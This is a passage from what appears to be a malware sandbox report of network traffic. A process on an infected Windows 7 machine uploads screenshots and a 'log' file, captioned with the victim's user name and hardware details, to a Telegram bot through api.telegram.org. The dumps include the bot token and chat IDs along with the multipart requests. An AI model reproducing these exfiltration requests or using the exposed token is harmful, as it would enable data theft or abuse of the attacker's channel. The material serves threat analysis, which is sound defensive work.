7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:53 UTC	2446	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:53 UTC	2462	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:53 UTC	2478	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:53 UTC	2480	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 63 33 32 33 35 61 39 64 65 2d 2d 0d 0a Data Ascii: -----------------------------8da198c3235a9de--
2022-04-08 10:14:54 UTC	2480	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:54 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":141,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412894,"document":{"file_name":"user-082561 2022-04-08 06-18-35.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA41iUAsemb1FM4rK_koHmifmU4PF3QACAQsAAkCUgFJ5CZV5xXkRlAEAB20AAyME","file_unique_id":"AQADAQsAAkCUgFJy","file_size":14417,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAONYlALHpm9RTOKyv5KB5on5lODxd0AAgELAAJAlIBSeQmVecV5EZQjBA","file_unique_id":"AgADAQsAAkCUgFI","file_size":116305},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.22	49192	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:14:59 UTC	2481	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da198efdb17ad0 Host: api.telegram.org Content-Length: 116893 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:14:59 UTC	2481	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:59 UTC	2481	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 65 66 64 62 31 37 61 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 65 66 64 62 31 37 61 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da198efdb17ad0Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da198efdb17ad0Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:59 UTC	2482	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:59 UTC	2498	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:59 UTC	2514	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:14:59 UTC	2530	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:59 UTC	2545	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:59 UTC	2561	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:59 UTC	2577	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:59 UTC	2593	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:59 UTC	2596	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 65 66 64 62 31 37 61 64 30 2d 2d 0d 0a Data Ascii: -----------------------------8da198efdb17ad0--
2022-04-08 10:14:59 UTC	2596	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:59 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":142,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412899,"document":{"file_name":"user-082561 2022-04-08 06-38-35.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA45iUAsjzTwMK1HF9fzj5AuJd9nesAACAgsAAkCUgFKI0BbMh_bpagEAB20AAyME","file_unique_id":"AQADAgsAAkCUgFJy","file_size":14417,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOOYlALI808DCtRxfX84-QLiXfZ3rAAAgILAAJAlIBSiNAWzIf26WojBA","file_unique_id":"AgADAgsAAkCUgFI","file_size":116305},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49174	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:13:16 UTC	543	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da195f7a6800de Host: api.telegram.org Content-Length: 945 Expect: 100-continue
2022-04-08 10:13:16 UTC	543	IN	HTTP/1.1 100 Continue
2022-04-08 10:13:16 UTC	543	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 35 66 37 61 36 38 30 30 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 35 66 37 61 36 38 30 30 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 4c 6f 67 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 31 0a 4f 53 46 75 6c Data Ascii: -----------------------------8da195f7a6800deContent-Disposition: form-data; name="chat_id"5019146869-----------------------------8da195f7a6800deContent-Disposition: form-data; name="caption"New Log Recovered!User Name: user/082561OSFul
2022-04-08 10:13:16 UTC	650	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:13:16 GMT Content-Type: application/json Content-Length: 644 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":124,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412796,"document":{"file_name":"user-082561 2022-04-08 12-58-29.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAN8YlAKvKMx3xEnQG6-rBHbHpiqC9QAAvAKAAJAlIBSYmReR8TNadMjBA","file_unique_id":"AgAD8AoAAkCUgFI","file_size":365},"caption":"New Log Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49175	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:13:16 UTC	543	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da195fc1ea40be Host: api.telegram.org Content-Length: 108279 Expect: 100-continue
2022-04-08 10:13:16 UTC	544	IN	HTTP/1.1 100 Continue
2022-04-08 10:13:16 UTC	544	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 35 66 63 31 65 61 34 30 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 35 66 63 31 65 61 34 30 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da195fc1ea40beContent-Disposition: form-data; name="chat_id"5019146869-----------------------------8da195fc1ea40beContent-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:13:16 UTC	545	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
